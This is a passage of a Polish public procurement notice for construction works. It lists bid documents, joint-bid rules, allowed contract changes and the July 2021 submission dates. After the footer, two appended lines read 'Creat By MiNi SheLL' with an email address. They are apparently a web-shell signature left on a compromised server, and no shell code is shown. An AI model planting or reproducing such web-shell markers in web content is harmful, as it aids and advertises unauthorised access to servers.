a jeżeli okres prowadzenia działalności jest krótszy – w tym zakresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 5 do SWZ<br/>Uwaga: Okres wyrażony w latach, o którym mowa, liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>c)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za projektowanie i kierowanie robotami budowlanymi, wraz z informacją o podstawie do dysponowania tymi osobami z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności stanowi załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony Formularz ofertowy – zgodnie z załącznikiem nr 1 do SWZ<br/> UWAGA:<br/>Formularz generowany przez Platformę jest „narzędziem technicznym”, niezbędnym do złożenia oferty na Platformie, nie stanowi on jednak faktycznego formularza oferty. Brak złożenia FORMULARZA OFERTY zgodnego z załącznikiem nr 1 do SWZ będzie stanowił podstawę do odrzucenia oferty, stosownie do zapisów art. 226 ust. 1 pkt 6 ustawy Pzp. W przypadku rozbieżności w treści pomiędzy Formularzem oferty (załącznik nr 1 do SWZ) a formularzem generowanym przez Platformę, jako wiążącą Zamawiający uzna treść załącznika nr 1 do niniejszej SWZ.<br/>2) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – <br/>zgodnie z załącznikiem nr 2 do SWZ,<br/>3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu – <br/>zgodnie z załącznikiem nr 3 do SWZ<br/>4) Dokument potwierdzający umocowanie do reprezentowania, w postaci:<br/>- odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (Wykonawca nie jest zobowiązany do złożenia tego dokumentu, jeżeli zamawiający może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów) lub:<br/>	pełnomocnictwa lub innego dokumentu, z którego wynika prawo do podpisania oferty (jeżeli dotyczy)<br/>5) Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp (jeżeli dotyczy)<br/>6) Oświadczenie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp ( jeżeli dotyczy),- wzór – załącznik nr 12 do SWZ<br/>7) Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnienie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, o którym mowa w art. 125 ust. 5 ustawy Pzp (jeżeli dotyczy) <br/>8)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie udzielenia zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia o których mowa w Rozdziale VIII ust. 1 SWZ, składa każdy <br/>z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Powyższy warunek obejmuje również wspólników spółki cywilnej.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>5.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwość wprowadzenia zmian do umowy: 1)W przypadku zmiany terminu zakończenia robót w związku z: a)nieprzekazaniem przez Zamawiającego Wykonawcy części terenu do prowadzenia robót, b)wystąpieniem działania siły wyższej uniemożliwiającej wykonanie przedmiotu zamówienia zgodnie z postanowieniami Umowy. c)wstrzymaniem prac budowl. przez Zamaw.o lub właściwyorgan z przyczyn niezawinionych przezWykon.,d)zmian będących następstwem okoliczności leżących po stronie Zamaw, f) koniecznością wykonania zam dodat. w rozumieniu przepisów o zamów. publ.,którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy; g)wystąpieniem opóźnień w dokonaniuokreślonych czynności lub ich zaniechania przez właściwe organy administracji, które nie są następstwem okoliczności, za które Wykon.ponosiodpowiedzialność;h) wyst. opóźnień lub sprzeciwów w wydawaniu decyzji, zezwoleń, uzgodnień, itp., .;i) wystąpieniem brakumożliwości wykonania robót z powodu nie dopuszczeniado ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy; 2) Zmiany wynagrodzenia umownego w przypadku zmiany:a) stawki podatku od towarów i usług, b) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu .3) Dopuszczasię zmiany dot. realizacji dodatkowych robót budowlanych od dotychczasowego wykon. nieobjętych zamówieniem podst,o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:a)zmiana wykonawcynie może zostać dokonana z powodówekonomicznych lub technicznych,w szczególności dotyczących zamienności lubinteroperacyjności sprzętu,usług lub instalacji,zamówionych w ramach zamówienia podstawowego,b)zmiana wykon.spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamaw., c)wartość każdej kolejnej zmiany nie przekracza50% wartości zamówieniaokreślonej pierwotnie w umowie4) Przewiduje się zmiany w sytuacjigdy zostały spełnione łącznie następującewarunki:a) konieczność zmianyumowy spowodowana jestokolicznościami, których zamaw.,działając z należytą starannością,nie mógł przewidzieć, b)wartośćzmiany nie przekracza50%wartości zamówienia określonejpierwotnie w umowie. 5) inne zmiany postanowieńniniejszej Umowy, takie jak: a) zmiany rodzajumateriałów, z których będą wykonane rob.bud.w przypadku zaprzestania produkcji materiału bądźwycofania i wprowadzenia przez producenta materiału o parametrach i cechach użytkowychlepszych lub jakościowo wyższych lub technologicznie nowszych.Zmiana rodzajumateriałów wymaga pisemnej akceptacji Zamawiającego,uzyskanie której wymagaprzedstawienia przez Wykonawcę szczegółowego uzasad. zmiany wraz z pisemnym potwierdzeniemproducenta parametrów nowych materiałów.Zmiana rodzaju materiałów nie może powodować podwyższenia wynagrodzenia określonego w Umowie i nie wymaga onasporządzenia aneksu do Umowy. b) zmianę osób, które będą uczestniczyły w wykonywaniu umowy na skutek np. ; c)Zmianaosób, które będą uczestniczyć wwykonywaniu przedmiotu umowy może nastąpić po uzyskaniu pisemnej zgody Zamaw. i spełnieniu przez te osoby warunków SWZ;2.Warunki wprow. zmian w niniejszej umowie:1)każdy wniosek o zmianę zapisów Umowywinien być przedłożony przezWykonawcę pisemnie wraz uzasadnieniem zmiany. 2)Zamawiającymoże uwzględnić możliwość wprowadzenia zmiany terminu końcowego lub częściowego tylko wzakresie czasu niezbędnego nausunięcie przeszkód wraz z czasemniezbędnym na dostosowanie się do zaistniałych nowych okoliczności uzasadniających zmiany.Wniosek winien być złożony przed terminemzakończenia, w czasie umożliwiającym przeprowadzenie u Zamaw. stosownej proc. w, to jest co najmniej14 dni roboczych przed terminem wymienionym w § 2 niniejszej Umowy.3.Zamaw. zastrzega,że wpr zmian do Umowynie będzie miałocharakteru automatycznego i zastrzega sobieprawo nieuwzgl. wniosku o dokonanie zmiany. 4. Zmiana umowy wymaga zach formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mzgmpila.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-15 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Jeżeli podczas wykonywania umowy: <br/>a) faktyczny postęp robót będzie w ocenie Zamawiającego zagrażał terminowi zakończenia robót lub określonemu terminowi zakończenia fazy danego etapu robót,<br/>b) Wykonawca nie dotrzyma terminu określonego w umowie,<br/>Wykonawca na żądanie Zamawiającego niezwłocznie, nie później jednak niż w terminie 7 dni, przedstawi Zamawiającemu do zatwierdzenia projekt Planu naprawczego. <br/>2. Plan naprawczy powinien przewidywać reorganizację sposobu wykonywania robót poprzez zwiększenie zaangażowania sprzętu, personelu, Podwykonawców lub zasobów finansowych Wykonawcy w celu dotrzymanie terminów realizacji umowy. <br/>3. Jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót za które odpowiedzialność ponosi Wykonawca, Wykonawca nie jest uprawniony do żądania przedłużenia terminu zakończenia robót lub otrzymania dodatkowego wynagrodzenia.<br/>4. Jeżeli z przyczyn niezależnych od Wykonawcy i niezawinionych przez niego, niemożliwa jest kontynuacja robót, Wykonawca powinien poinformować o powyższym pisemnie Zamawiającego wraz z uzasadnieniem.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com